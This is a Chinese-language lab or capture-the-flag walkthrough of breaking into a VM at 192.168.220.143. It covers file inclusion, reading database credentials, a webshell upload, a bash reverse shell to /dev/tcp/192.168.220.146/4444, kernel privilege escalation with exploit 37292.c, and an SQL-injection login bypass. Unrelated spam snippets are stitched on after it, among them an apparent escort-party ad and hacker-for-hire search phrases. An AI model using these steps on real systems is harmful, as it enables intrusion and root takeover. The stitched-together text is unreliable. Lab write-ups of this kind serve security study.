使用nmap或netdiscover扫描确定其ip
访问其80端口
发现是一个登入界面,使用御剑后台扫描工具和kali的dirb扫描网站目录
御剑扫描结果:
dirb扫描结果:
现在收集到的信息有:
http://192.168.220.143/add.php文件上传
http://192.168.220.143/in/? ? phpinfo()
http://192.168.220.143/phpmyphpMyAdmin
http://192.168.220.143/test文件包含
访问192.168.220.143/test.php使用brup抓包
将请求 *** 改为post
在Params中加参数file和对应的内容
单包发送,得到对应文件的内容
证明该页面存在文件包含漏洞,查看c.php(猜测可能是配置文件)
得到数据库连接用户名密码,在phpMyAdmin页面使用用户名密码登入
成功登入,得到登入web界面的用户名密码
成功登入web界面
选择添加用户,发现可以上传文件,开始上传一句话图片木马
访问http://192.168.220.143/panel.php?1=phpinfo(); 使用brup抓包,修改load参数为图片地址
发现成功显示了phpinfo() ,说明可以反弹shell
使用brup的编码模块对echo 'bash -i >& /dev/tcp/192.168.220.146/4444 0>&1' | bash进行url编码
注意:ip是kali的ip,端口是监听的端口,要写单引号
在kali中开启监听
使用burp构造payload,点击Go访问
注意:url编码的代码要加到system("");里
成功反弹shell
查看那个目录有写权限,打算写一个一句话木马
进入uploaded_images目录,写木马
拿到webshell,查看系统和内核版本
使用kali的searchsploit命令搜索提权代码,使用37292.c提权,下载文件到kali
然后拷贝到真机,绕后通过菜刀上传到目标机器
编译提权文件
执行编译后的执行文件,成功提权到root权限
爆破phpmy目录下的文件
使用文件包含漏洞,查看config.inc.php文件内容
可以看到账号密码,直接使用此账号密码ssh连接目标主机,拿到root权限
使用文件包含漏洞查看index.php源码,分析其过滤规则,然后构造payload绕过
最后测试出uname=or 1=1#? pass=\? ? 能成功登入
加 \ 号是为了让后面的unmae逃逸出来,使用此payload的后的sql语句:
select * from auth where pass='\' and uname=' or 1=1#'
现在的年轻人很容易长痘痘,相信大家都一样吧,很多人长痘痘的地方是在眉头上方的两边,是很令人烦恼的,所以大家都会问眉头上长痘是什么原因?一起来看看吧。 女生对于自己的形象是很重视的,当然男生也是如...
甜,是一种老少皆宜的口味,相信很少能有人抵挡得住这种甜入内心的诱惑。甜品,作为一种代表性的美食,更是受到了众多消费者的喜爱追捧。香甜的滋味、软糯的口感,让甜品行业迅速的积累了大量的人气,也吸引了无数的...
身份证号码的格式(身份证号码设置显示格式)Hello,大家好,今天来解决一个粉丝提问的问题:如何为身份证号码设置显示格式,如下图,让身份证号码6-8-4的方式进行显示,他说这自己想了好久也没想出来办法...
时尚界的新宠儿,“北京丰台区商务”,前不久举行了一场高端模特party。前去报名参加的女学妹类型有平面图车展模特,在校大学生,商务空中小姐,预约的订金是508。每一年北京丰台商务都是举行相近的主题活动...
找黑客删除群文件相关问题 个人招聘网络黑客相关问题 黑客有什么坏处 黑客入侵 报警 时效(黑客入侵模拟器) 黑客...
首先,我们先要知道什么是SN码。SN码是Serial Number的缩写,有时也叫SerialNo,也就是产品序列号,产品序列是为了验证“产品的合法身份”而引入的一个概念,它是用来保障用户的正版权益,...